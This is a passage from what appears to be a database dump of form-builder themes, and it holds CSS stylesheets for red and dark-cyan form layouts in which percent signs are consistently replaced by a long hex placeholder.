5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #36690c;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #62983A; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #61b217 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #62983a 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #62983a 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #61b217), color-stop(39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #62983a), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #62983a)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #61b217 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #62983a 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #62983a 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #61b217 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #62983a 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #62983a 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #61b217 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #62983a 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #62983a 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\n	background: linear-gradient(to right, #61b217 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #62983a 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #62983a 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height: 18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/01/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(10,'Theme 03 red','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #811919;\r\nmargin-bottom: 10px;\r\ncolor: #811919;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #942323 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/02/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n.button-submit {\r\nbackground: #811919;\r\ncursor: pointer;\r\nfont-size: 17px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 2px solid #9E1919;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #811818;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #F0EEEF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/02/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #fff;\r\nfont-size: 18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\ncolor: #555;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #640B0B;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #942323;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #752D2D ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #9A0B0B  0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7B2828 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #752D2D 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #9A0B0B ), color-stop(39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7B2828 ), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #752D2D )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #9A0B0B 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7B2828 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #752D2D 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #9A0B0B 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7B2828 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #752D2D 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #9A0B0B 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7B2828 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #752D2D 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\n	background: linear-gradient(to right, #9A0B0B 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7B2828 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #752D2D 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height:18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/02/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(11,'Theme 03 dark cyan','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #0B7A97;\r\nmargin-bottom: 10px;\r\ncolor: #0B7A97;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	